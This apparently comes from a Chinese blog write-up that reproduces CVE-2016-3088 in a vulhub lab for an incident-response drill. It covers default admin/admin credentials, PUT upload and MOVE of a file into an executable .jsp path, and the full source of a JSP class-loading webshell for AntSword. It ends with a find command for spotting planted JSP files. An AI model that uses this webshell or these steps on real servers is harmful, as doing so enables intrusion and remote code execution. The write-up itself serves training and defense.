首页 > 其他分享 >CVE-2016-3088-复现

CVE-2016-3088-复现

时间:2024-02-18 14:22:09浏览次数:46  
标签:CVE admin jsp 3088 2016 上传 链接

最近要做应急演练,用到了这个漏洞,就顺便记录一下这个靶场的流程 环境就不记录了,用的是vulhub的靶场 参考链接:https://www.bilibili.com/read/cv12103854/ https://blog.csdn.net/weixin_44047654/article/details/128033455 ps:关于该漏洞的成因,我对代码审计不是很懂,这里就不记录了,有兴趣的可以看看参考链接里的分析。     0x01 账户密码是:admin/admin   0x02 登陆后台访问/admin/test/systemProperties.jsp拿绝对路径   0x03    通过put的方式传入文本形式的shell,显示204即为上传成功 访问可以看到上传成功   0x04 利用MOVE方法将上传的wbsh©移动到可以执行的目录并更改后缀为jsp。 进行利用尝试,执行命令   0x05 传入一句话木马,蚁剑链接,同上述方法一致(当时执行的时候忘截图了)   文本:(找不到参考的链接了) <%!     class U extends ClassLoader {         U(ClassLoader c) {             super(c);         }         public Class g(byte[] b) {             return super.defineClass(b, 0, b.length);         }     }         public byte[] base64Decode(String str) throws Exception {         try {             Class clazz = Class.forName("sun.misc.BASE64Decoder");             return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);         } catch (Exception e) {             Class clazz = Class.forName("java.util.Base64");             Object decoder = clazz.getMethod("getDecoder").invoke(null);             return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);         }     } %> <%     String cls = request.getParameter("passwd");     if (cls != null) {         new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);     } %> 上传成功: 连接蚁剑:     0x06 排查 命令:find -name "*.jsp" -exec stat -c "%n %y" {} \;  

标签:CVE,admin,jsp,3088,2016,上传,链接
From: https://www.cnblogs.com/xyhz/p/18019222

相关文章

  • 洛谷P6169 [IOI2016] Molecules
    洛谷传送门分析结论:如果存在解,则一定有一个解使得选的数是排序后的一段前缀并上一段后缀。下文所说序列均已排序。引理:对于一个可行解选的某个数,一定可以将其换成序列中的最小数或最大数而使得换完之后还是一个可行解。证明:反证法。假设都不可换。设当前选的所有数的和为\(......
  • P3643 [APIO2016] 划艇
    题意给定数列\(a,b\),试求出序列\(S\)的方案数,使得:\(a_i\leS_i\leb_i,S_{i-1}<S_i\)或\(S_i=0\)。\(S\)不能是全\(0\)序列。\(a_i,b_i\le10^9,n\le500\)Sol不难想到一个trivial的思路。设\(f_{i,j}\)表示确定了\(S_1\toS_i\),并且\(S......
  • Apache Ofbiz CVE-2023-51467 漏洞分析
    ApacheOfbizCVE-2023-51467漏洞分析漏洞影响范围ApacheOFBiz<18.12.10环境搭建启动docker环境vulhub-master/ofbiz/CVE-2023-51467克隆仓库,转到指定commit,用idea进行远程调试gitclonehttps://github.com/apache/ofbiz-framework.gitcdofbiz-frameworkgitche......
  • JOISC 2016 题解
    JOISC2016loj上有几乎全部的题目,写了题意的就是loj上没有的。D1T1一开始把题目看错了,还写了棵线段树。把询问离线,倒着扫一遍,就变成了求最长不上升子序列,用树状数组维护即可。提交记录D1T2来自Kubic的神仙做法。考虑Filp一个位置和剩下所有位置,记录每个数作为答案......
  • 题解 AT_mujin_pc_2016_c【オレンジグラフ】
    本文中点的编号从\(0\)开始。显然,题目中要求橙色的边构成极大的二分图。枚举二分图左右部分别有哪些点。特别地,钦定\(0\)号点是左部点。将所有跨左右部的边染为橙色,如果所有点通过橙色的边连通,就得到了一组合法的解;如果不连通,显然可以将更多的边染成橙色,使得所有点连通。//......
  • Apache Ofbiz CVE-2020-9496
    ofbiz官网:https://ofbiz.apache.org/比较好的参考文章:https://blog.csdn.net/weixin_45728976/article/details/108872281影响版本ApacheOfbiz:<17.12.04漏洞原理:访问未授权的XML-RPC接口,构造XML-RPC协议请求格式,利用XML-RPC协议进行反序列化XML-RPC介绍:XML-RPC(XMLRemot......
  • Apache Ofbiz CVE-2021-26295分析
    漏洞影响版本:apache:ofbiz<17.12.06补丁代码:https://github.com/apache/ofbiz-framework/commit/af9ed4e/漏洞触发路径:https://ip:8443/webtools/control/SOAPService漏洞复现环境搭建:dockerpullandyjunghans/ofbizdockerrun-p8080:8080-p8443:8443andyjunghans/of......
  • P2016 战略游戏
    原题链接悟道树形图看成线性结构?code#include<bits/stdc++.h>usingnamespacestd;vector<int>G[1505];intsum[1505][2]={0};voidss(intnow,intfa){sum[now][1]=1;for(inti=0;i<G[now].size();i++){intnext=G[now][i];if(......
  • 云小课|Runc容器逃逸漏洞(CVE-2024-21626)安全风险通告
    阅识风云是华为云信息大咖,擅长将复杂信息多元化呈现,其出品的一张图(云图说)、深入浅出的博文(云小课)或短视频(云视厅)总有一款能让您快速上手华为云。更多精彩内容请单击此处。runc官方发布安全公告,披露runc1.1.11及更早版本中存在容器逃逸漏洞,攻击者会利用该漏洞导致容器逃逸......
  • P6885 [COCI2016-2017#3] Zoltan
    Marton的朋友Cero有一个由\(N\)个正整数组成的数组。首先Cero会在黑板上写下这个数组中的第一个数字。接下来他会在之前写下的所有数的左边或者右边写下一个数字。重复以上操作得到一个序列。请注意,根据上述方法构造出的两个序列相同当且仅当每一个数字写下的顺序完全相......